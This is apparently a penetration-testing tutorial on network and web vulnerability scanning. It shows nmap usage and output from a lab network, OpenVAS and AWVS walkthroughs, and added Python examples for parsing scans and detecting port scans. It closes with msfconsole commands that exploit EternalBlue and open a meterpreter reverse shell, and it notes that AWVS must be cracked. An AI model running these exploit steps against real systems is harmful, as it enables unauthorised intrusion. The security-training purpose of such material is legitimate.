Scanning Techniques

Discover what assets exist in the target environment: networked devices, hosts, servers, and the services they run. Network vulnerability scanning gives a comprehensive picture of the security vulnerabilities present on the target servers. Commonly used scanners on the market include Nessus, NeXpose and OpenVAS.

  • Principles of vulnerability scanning

Network vulnerability scanning means using automated tools to find security vulnerabilities in the various hosts and devices on a network. These automated tools are generally called vulnerability scanners. Vulnerability scanning is usually divided into two kinds: black-box scanning and white-box scanning.

  • Black-box scanning

Black-box scanning generally identifies the type and version of a service remotely and decides from that whether the service is vulnerable. Some of the latest vulnerability scanners apply more advanced techniques, such as simulated penetration attacks.

  • White-box scanning

White-box scanning is vulnerability scanning performed with operating privileges on the host. Microsoft's update program, for example, periodically scans your operating system for security vulnerabilities and pushes the corresponding patches to you. White-box results are more accurate, but in general the vulnerabilities they identify should not be taken as the final data of an external penetration test: because of firewalls and assorted protective software, those vulnerabilities very likely cannot be exploited from outside. Besides, you normally have no opportunity to obtain usernames and passwords.

A vulnerability scanner usually ships with a signature library for identifying host vulnerabilities, which is updated regularly. During a scan, the scripts in that library are matched against the target system's responses; a match means a particular vulnerability is present. While identifying vulnerabilities, the scanner sends a large volume of packets to the target, which can sometimes cause the target system to deny service or become congested with scan traffic, and the scanning activity can also be picked up by the other side's intrusion detection equipment.

Scanner results usually contain many false positives (a reported vulnerability that does not actually exist) and false negatives (a vulnerability that exists but was not reported). The results therefore need manual analysis to determine which vulnerabilities are real; this process is called vulnerability verification. It is an indispensable step in penetration testing: only once a vulnerability is confirmed to be real can it be exploited in depth. In penetration testing work, a scanner may be used with the client's approval, but care must be taken to avoid risk and to keep any impact on the running systems to a minimum.

nmap

Cross-platform; when no ports are specified, it scans ports 1~1000 by default.

Option        Effect
-sP/-sn       ping scan (host discovery)
-p 80         port 80 only
-p 1-80       ports 1-80
-p 80,3389    ports 80 and 3389
-p-           all ports, 1-65535
-sT           TCP connect (full handshake) scan
-sS           SYN (half-open) scan
-sN           Null scan
-sX           Xmas scan
-sF           FIN scan
-sV           service version detection (shows detailed service versions)
-O            enable OS detection
-A            comprehensive scan
-oN/-oX       save results as text/XML
-T0~-T5       timing templates

root@kali:~# nmap 10.0.0.0/24 -sP
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 13:36 CST
Nmap scan report for 10.0.0.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.0.0.2
Host is up (0.000098s latency).
MAC Address: 00:50:56:EF:31:20 (VMware)
Nmap scan report for 10.0.0.7
Host is up (0.00020s latency).
MAC Address: 00:0C:29:19:02:C3 (VMware)
Nmap scan report for 10.0.0.254
Host is up (0.00015s latency).
MAC Address: 00:0C:29:E5:20:37 (VMware)
Nmap scan report for 10.0.0.221
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.06 seconds
root@kali:~# nmap 10.0.0.7 -p-       
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 13:37 CST
Nmap scan report for 10.0.0.7
Host is up (0.0011s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
9200/tcp open  wap-wsp
9300/tcp open  vrace
MAC Address: 00:0C:29:19:02:C3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds
root@kali:~# nmap 10.0.0.0/24 -p 80    
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 13:38 CST
Nmap scan report for 10.0.0.1
Host is up (0.00027s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 10.0.0.2
Host is up (0.00011s latency).

PORT   STATE  SERVICE
80/tcp closed http
MAC Address: 00:50:56:EF:31:20 (VMware)

Nmap scan report for 10.0.0.7
Host is up (0.00024s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:19:02:C3 (VMware)

Nmap scan report for 10.0.0.254
Host is up (0.000073s latency).

PORT   STATE    SERVICE
80/tcp filtered http
MAC Address: 00:0C:29:E5:20:37 (VMware)

Nmap scan report for 10.0.0.221
Host is up (0.000052s latency).

PORT   STATE  SERVICE
80/tcp closed http

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.47 seconds
root@kali:~# nmap 10.0.0.7 -A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 13:38 CST
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 13:39 (0:00:07 remaining)
Stats: 0:00:32 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 13:39 (0:00:09 remaining)
Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 13:39 (0:00:10 remaining)
Stats: 0:01:24 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 13:40 (0:00:26 remaining)
Nmap scan report for 10.0.0.7
Host is up (0.0012s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 5f:4b:28:0f:20:9f:b7:dc:a7:25:9a:fc:d7:31:a0:63 (RSA)
|   256 e4:a3:00:75:0d:a3:39:a0:98:38:fe:5b:a8:62:04:f8 (ECDSA)
|_  256 f5:48:1e:be:c8:d6:f6:a1:76:9e:a7:24:42:f7:dc:80 (ED25519)
80/tcp   open  http     nginx 1.18.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: nginx/1.18.0
|_http-title: \xE7\xA5\x9E\xE5\x87\xBA\xE9\xAC\xBC\xE6\xB2\xA1\xE7\x9A\x84Enderman - long long ago,I was born.
3306/tcp open  mysql    MySQL 5.7.28
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.28
|   Thread ID: 1268
|   Capabilities flags: 65535
|   Some Capabilities: SupportsLoadDataLocal, LongColumnFlag, IgnoreSigpipes, Speaks41ProtocolOld, SupportsTransactions, Support41Auth, SupportsCompression, FoundRows, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, LongPassword, InteractiveClient, ConnectWithDatabase, DontAllowDatabaseTableColumn, ODBCClient, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: &fbK?\x08\Q\x1AT%]6"?2\x0Cxy8
|_  Auth Plugin Name: 79
9200/tcp open  wap-wsp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.0 200 OK
|     content-type: application/json; charset=UTF-8
|     content-length: 492
|     "name" : "node-1",
|     "cluster_name" : "elasticsearch",
|     "cluster_uuid" : "RpKAqucdQR6DbP8QChZ6CA",
|     "version" : {
|     "number" : "6.7.0",
|     "build_flavor" : "default",
|     "build_type" : "rpm",
|     "build_hash" : "8453f77",
|     "build_date" : "2019-03-21T15:32:29.844721Z",
|     "build_snapshot" : false,
|     "lucene_version" : "7.7.0",
|     "minimum_wire_compatibility_version" : "5.6.0",
|     "minimum_index_compatibility_version" : "5.0.0"
|     "tagline" : "You Know, for Search"
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Allow: DELETE,GET,HEAD
|     content-type: text/plain; charset=UTF-8
|     content-length: 0
|   Help, SSLSessionReq: 
|     HTTP/1.0 400 Bad Request
|     content-type: application/json; charset=UTF-8
|     content-length: 203
|     {"error":{"root_cause":[{"type":"illegal_argument_exception","reason":"text is empty (possibly HTTP/0.9)"}],"type":"illegal_argument_exception","reason":"text is empty (possibly HTTP/0.9)"},"status":400}
|   RTSPRequest: 
|     HTTP/1.1 200 OK
|     Allow: DELETE,GET,HEAD
|     content-type: text/plain; charset=UTF-8
|_    content-length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9200-TCP:V=7.70%I=7%D=12/10%Time=5FD1B463%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,243,"HTTP/1\.0\x20200\x20OK\r\ncontent-type:\x20application/j
SF:son;\x20charset=UTF-8\r\ncontent-length:\x20492\r\n\r\n{\n\x20\x20\"nam
SF:e\"\x20:\x20\"node-1\",\n\x20\x20\"cluster_name\"\x20:\x20\"elasticsear
SF:ch\",\n\x20\x20\"cluster_uuid\"\x20:\x20\"RpKAqucdQR6DbP8QChZ6CA\",\n\x
SF:20\x20\"version\"\x20:\x20{\n\x20\x20\x20\x20\"number\"\x20:\x20\"6\.7\
SF:.0\",\n\x20\x20\x20\x20\"build_flavor\"\x20:\x20\"default\",\n\x20\x20\
SF:x20\x20\"build_type\"\x20:\x20\"rpm\",\n\x20\x20\x20\x20\"build_hash\"\
SF:x20:\x20\"8453f77\",\n\x20\x20\x20\x20\"build_date\"\x20:\x20\"2019-03-
SF:21T15:32:29\.844721Z\",\n\x20\x20\x20\x20\"build_snapshot\"\x20:\x20fal
SF:se,\n\x20\x20\x20\x20\"lucene_version\"\x20:\x20\"7\.7\.0\",\n\x20\x20\
SF:x20\x20\"minimum_wire_compatibility_version\"\x20:\x20\"5\.6\.0\",\n\x2
SF:0\x20\x20\x20\"minimum_index_compatibility_version\"\x20:\x20\"5\.0\.0\
SF:"\n\x20\x20},\n\x20\x20\"tagline\"\x20:\x20\"You\x20Know,\x20for\x20Sea
SF:rch\"\n}\n")%r(HTTPOptions,67,"HTTP/1\.0\x20200\x20OK\r\nAllow:\x20DELE
SF:TE,GET,HEAD\r\ncontent-type:\x20text/plain;\x20charset=UTF-8\r\ncontent
SF:-length:\x200\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20200\x20OK\r\nAll
SF:ow:\x20DELETE,GET,HEAD\r\ncontent-type:\x20text/plain;\x20charset=UTF-8
SF:\r\ncontent-length:\x200\r\n\r\n")%r(Help,12B,"HTTP/1\.0\x20400\x20Bad\
SF:x20Request\r\ncontent-type:\x20application/json;\x20charset=UTF-8\r\nco
SF:ntent-length:\x20203\r\n\r\n{\"error\":{\"root_cause\":\[{\"type\":\"il
SF:legal_argument_exception\",\"reason\":\"text\x20is\x20empty\x20\(possib
SF:ly\x20HTTP/0\.9\)\"}\],\"type\":\"illegal_argument_exception\",\"reason
SF:\":\"text\x20is\x20empty\x20\(possibly\x20HTTP/0\.9\)\"},\"status\":400
SF:}")%r(SSLSessionReq,12B,"HTTP/1\.0\x20400\x20Bad\x20Request\r\ncontent-
SF:type:\x20application/json;\x20charset=UTF-8\r\ncontent-length:\x20203\r
SF:\n\r\n{\"error\":{\"root_cause\":\[{\"type\":\"illegal_argument_excepti
SF:on\",\"reason\":\"text\x20is\x20empty\x20\(possibly\x20HTTP/0\.9\)\"}\]
SF:,\"type\":\"illegal_argument_exception\",\"reason\":\"text\x20is\x20emp
SF:ty\x20\(possibly\x20HTTP/0\.9\)\"},\"status\":400}");
MAC Address: 00:0C:29:19:02:C3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.23 ms 10.0.0.7

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.01 seconds
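The -oX option above writes the scan as XML, which is the form a practitioner actually consumes: the inventory it yields is what the signature-matching and manual-verification steps described in the principles section operate on. The following is an added example, not code from the page or from the nmap project. It parses nmap XML into an asset inventory, checks that inventory against a baseline of approved exposures (a constructed stand-in for a signature library), and diffs two inventories to catch newly opened ports. The XML is constructed to mirror the 10.0.0.7 results shown above; the BASELINE set and the conf threshold of 5 are assumptions.

```python
"""Parse `nmap -oX` output into an asset inventory and triage it against a
baseline. Added example; the XML below is constructed from the 10.0.0.7 scan
on this page, it is not a file the page provides."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed nmap XML, shaped like real `nmap -sV -oX scan.xml 10.0.0.7` output.
# conf is nmap's own 0-10 confidence in the service identification: 10 means a
# version probe matched, 3 means the name was only looked up in nmap-services.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 10.0.0.7" version="7.70">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="10.0.0.7" addrtype="ipv4"/>
    <address addr="00:0C:29:19:02:C3" addrtype="mac" vendor="VMware"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="7.4" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="nginx" version="1.18.0" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="3306"><state state="open" reason="syn-ack"/>
        <service name="mysql" product="MySQL" version="5.7.28" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="9200"><state state="open" reason="syn-ack"/>
        <service name="wap-wsp" method="table" conf="3"/></port>
      <port protocol="tcp" portid="9300"><state state="open" reason="syn-ack"/>
        <service name="vrace" method="table" conf="3"/></port>
      <port protocol="tcp" portid="443"><state state="closed" reason="reset"/>
        <service name="https" method="table" conf="3"/></port>
    </ports>
  </host>
</nmaprun>
"""


@dataclass(frozen=True)
class Service:
    host: str
    port: int
    proto: str
    name: str
    product: str
    version: str
    conf: int


def parse_nmap_xml(xml_text):
    """Return one Service per open port in the nmap XML document."""
    root = ET.fromstring(xml_text)
    inventory = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            attrs = svc.attrib if svc is not None else {}
            inventory.append(Service(
                host=addr_el.get("addr"),
                port=int(port.get("portid")),
                proto=port.get("protocol"),
                name=attrs.get("name", ""),
                product=attrs.get("product", ""),
                version=attrs.get("version", ""),
                conf=int(attrs.get("conf", "0")),
            ))
    return inventory


# Constructed baseline (assumption): exposures the asset owner has signed off on.
# A baseline is the simplest "signature library": anything outside it is a candidate.
BASELINE = {("10.0.0.7", 22), ("10.0.0.7", 80)}


def triage(inventory, baseline):
    """Flag open services outside the baseline. Each item is a candidate only;
    the reason text says what still has to be verified by hand."""
    findings = []
    for s in inventory:
        if (s.host, s.port) in baseline:
            continue
        reason = "open port not in baseline"
        if s.conf < 5:
            # Name came from the port-number table, not a version probe; the
            # page's own scan shows 9200 as 'wap-wsp' although it answered as
            # Elasticsearch, so the label must not be trusted as-is.
            reason += "; service name is a table guess (conf=%d), identify manually" % s.conf
        findings.append((s, reason))
    return findings


def new_exposures(previous, current):
    """Diff two inventories: (host, port) pairs open now that were not before."""
    before = {(s.host, s.port) for s in previous}
    return sorted((s.host, s.port) for s in current if (s.host, s.port) not in before)


if __name__ == "__main__":
    inv = parse_nmap_xml(SAMPLE_XML)
    for svc, why in triage(inv, BASELINE):
        print(f"{svc.host}:{svc.port}/{svc.proto} {svc.name} {svc.product} {svc.version} -> {why}")
```

Run on real output from `nmap -sV -oX scan.xml <range>`, replace SAMPLE_XML with the file contents and keep the baseline under version control; the diff function is what turns a one-off scan into continuous asset monitoring.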
  • -sS: SYN (half-open) scan

  • -sT: TCP connect (full handshake) scan

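The difference between the two scan types is visible on the wire, which is how the intrusion detection equipment mentioned earlier picks scans up. The following is an added example, not code from the page or from nmap: it builds constructed packet records for both probe styles against the ports the page's -p- scan found open on 10.0.0.7, labels each probed port by how far the handshake got, and raises a port-scan alert once one source has touched enough ports on one target. The flag strings, the scanner address 10.0.0.221 and the threshold of 5 are assumptions.

```python
"""Distinguish a SYN (half-open) scan from a connect() scan in captured packets
and raise a port-scan alert. Added example with constructed packets, modelled
on what a sensor between 10.0.0.221 and 10.0.0.7 would see; not from the page."""
from collections import defaultdict

# Packet records: (src, dst, dport, direction, tcp_flags). "->" is scanner to
# target, "<-" is target to scanner. Flags: S=SYN, A=ACK, R=RST, F=FIN.


def syn_probe(src, dst, port, is_open):
    """-sS: SYN out; an open port answers SYN-ACK and the scanner replies with a
    bare RST instead of completing the handshake; a closed port answers RST-ACK."""
    pkts = [(src, dst, port, "->", "S")]
    if is_open:
        pkts += [(src, dst, port, "<-", "SA"), (src, dst, port, "->", "R")]
    else:
        pkts.append((src, dst, port, "<-", "RA"))
    return pkts


def connect_probe(src, dst, port, is_open):
    """-sT: the OS completes the handshake (SYN, SYN-ACK, ACK) and the scanner
    then closes the socket; closed ports look exactly as in a SYN scan."""
    pkts = [(src, dst, port, "->", "S")]
    if is_open:
        pkts += [(src, dst, port, "<-", "SA"), (src, dst, port, "->", "A"),
                 (src, dst, port, "->", "FA")]
    else:
        pkts.append((src, dst, port, "<-", "RA"))
    return pkts


def classify_flows(packets):
    """Group packets per (src, dst, dport) and label how far each probe got."""
    flows = defaultdict(list)
    for src, dst, port, direction, flags in packets:
        flows[(src, dst, port)].append((direction, flags))
    labels = {}
    for key, seq in flows.items():
        outbound = {f for d, f in seq if d == "->"}
        inbound = {f for d, f in seq if d == "<-"}
        if "SA" not in inbound:
            # RST-ACK (or silence) from the target: nothing to listen on
            labels[key] = "closed"
        elif "A" in outbound:
            # Handshake completed: connect() scan; the service's own log sees it
            labels[key] = "connect-open"
        elif "R" in outbound:
            # SYN-ACK met with RST: half-open scan, invisible to the application,
            # visible only to something watching the network
            labels[key] = "syn-open"
        else:
            labels[key] = "incomplete"
    return labels


def port_scan_alerts(labels, threshold=5):
    """One source touching >= threshold distinct ports on one target is a scan,
    whichever technique it used. threshold=5 is an assumption; tune per site."""
    per_pair = defaultdict(set)
    for src, dst, port in labels:
        per_pair[(src, dst)].add(port)
    return {pair: sorted(ports) for pair, ports in per_pair.items()
            if len(ports) >= threshold}


# Constructed sample: the ports the page's -p- scan of 10.0.0.7 found open, plus
# a closed 443 so both branches of each probe are exercised.
OPEN_PORTS = {22, 80, 3306, 9200, 9300}
PROBED = [22, 80, 443, 3306, 9200, 9300]


def sample_capture(probe):
    """Constructed capture of one scanner sweeping PROBED with the given probe style."""
    pkts = []
    for port in PROBED:
        pkts += probe("10.0.0.221", "10.0.0.7", port, port in OPEN_PORTS)
    return pkts


if __name__ == "__main__":
    for name, probe in (("-sS", syn_probe), ("-sT", connect_probe)):
        labels = classify_flows(sample_capture(probe))
        print(name, sorted(set(labels.values())), port_scan_alerts(labels))
```

The practical point for defenders: a connect scan shows up in both the sensor and the target's application logs, while a SYN scan never completes a connection and so only a network-level view (flow records, IDS) will record it.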
OpenVAS

Installing OpenVAS

It is recommended to download the ISO image from the official site and install from it (image download address).

  • Create a new virtual machine

The download is a split archive; after downloading, rename the parts to their corresponding names and extract them into the ISO image.

  1. System: Linux
  2. Version: Other Linux 64-bit
  3. Memory: 4G
  4. Disk: 20G
  5. CPUs: 2
  6. Image: gsm-ce-6.0.3.iso

  • Start the virtual machine and run the installation

  • Wait about 3 minutes

  • Then enter the password to confirm

  • Log in

  • The current IP address can be seen on the About tab

Using OpenVAS

  • Create a new scan target

  • Create a new scan task

  • Start the scan

Web vulnerability scanning

With the growth of the Internet and of cloud computing, governments, banks, enterprises and organisations of every kind now have their own portal websites. Web applications keep multiplying, and because attacking them is cheap and not especially difficult, they have become hackers' main target. Whatever a hacker's motive, the challenges facing web applications are great. How to find web application security vulnerabilities promptly, patch them, and reduce or eliminate web security risk has become an important topic for the security industry. A small web application has tens to hundreds of pages; a large one has thousands or tens of thousands. Checking the security of every page by hand would clearly cost an incalculable amount, so we need automated tools to help auditors find web security vulnerabilities. These automated tools are web vulnerability scanners. There are many on the market, among which IBM's AppScan and the commercial web vulnerability scanner AWVS stand out.

  • Principles of web vulnerability scanning

A web vulnerability scan roughly proceeds in the following steps:

  1. Crawl the site's directories
  2. Scan with vulnerability scripts
  3. Save the scan results
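The three steps are the architecture of every web scanner, including the report structure described further down (vulnerable page, offending parameter, saved report file). The following is an added example, not the code of AWVS, AppScan or any scanner the page names: a minimal scanner skeleton with a same-host crawler, pluggable check scripts, and a save step, run over a constructed offline site. The only active check is the cookie-flag test that nmap's http-cookie-flags script also performed in the scan above; the second "check" merely inventories form parameters. FAKE_SITE, the host example.test and the choice of JSON for saving are assumptions.

```python
"""The three stages of a web vulnerability scanner from the text (crawl, run
check scripts, save results) over a constructed offline site. Added example,
not the code of any scanner the page names; FAKE_SITE and example.test are made up."""
import json
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed site: URL -> (response headers, HTML body). fetch() reads from it
# instead of making HTTP requests, so the whole thing runs offline.
FAKE_SITE = {
    "http://example.test/": (
        {"Set-Cookie": "PHPSESSID=abc123; path=/"},          # neither HttpOnly nor Secure
        '<a href="/login.php">login</a> <a href="/about.html">about</a>'),
    "http://example.test/login.php": (
        {"Set-Cookie": "PHPSESSID=abc123; path=/; HttpOnly; Secure"},
        '<form action="/login.php" method="post">'
        '<input name="user"><input name="pass"></form>'),
    "http://example.test/about.html": (
        {}, '<a href="http://other.test/">elsewhere</a> <a href="/">home</a>'),
}

def fetch(url):
    """Stand-in for an HTTP GET. Returns (headers, body) or None for a 404."""
    return FAKE_SITE.get(url)

class LinkFormParser(HTMLParser):
    """Collects <a href> targets and <form> parameter names from one page."""
    def __init__(self):
        super().__init__()
        self.links, self.forms, self._form = [], [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "form":
            self._form = {"action": a.get("action", ""),
                          "method": a.get("method", "get").lower(), "params": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("name"):
            self._form["params"].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None

def crawl(start_url, max_pages=100):
    """Stage 1: breadth-first crawl that stays on the starting host."""
    host = urlparse(start_url).netloc
    seen, queue, pages = set(), [start_url], {}
    while queue and len(pages) < max_pages:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        resp = fetch(url)
        if resp is None:
            continue
        headers, body = resp
        parser = LinkFormParser()
        parser.feed(body)
        pages[url] = (headers, body, parser.forms)
        for href in parser.links:
            target = urljoin(url, href)
            if urlparse(target).netloc == host and target not in seen:
                queue.append(target)
    return pages

def check_cookie_flags(url, headers, forms):
    """Stage 2 check: the same test nmap's http-cookie-flags script runs."""
    cookie = headers.get("Set-Cookie")
    if not cookie:
        return []
    name = cookie.split("=", 1)[0]
    attrs = {part.strip().lower() for part in cookie.split(";")[1:]}
    return [{"url": url, "check": "cookie-flags", "param": name,
             "detail": f"{flag} flag not set"}
            for flag in ("httponly", "secure") if flag not in attrs]

def check_forms(url, headers, forms):
    """Stage 2 inventory: the 'page and parameter' column of a scan report."""
    return [{"url": url, "check": "form-inventory",
             "param": ",".join(f["params"]), "detail": f"{f['method']} {f['action']}"}
            for f in forms]

CHECKS = [check_cookie_flags, check_forms]

def scan(start_url):
    """Run every check script over every crawled page."""
    results = []
    for url, (headers, _body, forms) in crawl(start_url).items():
        for check in CHECKS:
            results.extend(check(url, headers, forms))
    return results

def save_results(results, path):
    """Stage 3: persist the findings (JSON here; AWVS uses its own .wvs format)."""
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(results, fh, indent=2)
    return path
```

Each entry in the result carries the URL, the check that fired, the parameter and a detail string, which is exactly the triage view described under "Analysing the scan results" below; a real scanner differs mainly in the number and depth of its check scripts, not in this shape.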

The installer is a matter of clicking Next; after it completes, the software has to be cracked.

Creating a scan target

  • Username and password are both test

Analysing the scan results

  • Each vulnerability entry can be expanded to show the page that contains the vulnerability and the parameter that causes it. The right-hand sidebar shows the vulnerability's details, including its description and the test payload.

Saving the scan report

  • The scan results can be saved. Saved result files have the extension [.wvs]. If a virtual printer is installed, the results can also be saved as PDF, which is convenient for circulation.

Reproducing the EternalBlue vulnerability

  • Tool: msfconsole (msf)

msfconsole
search MS17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
# target machine IP
set RHOST 10.0.0.5
# local IP
set LHOST 10.0.0.221
exploit
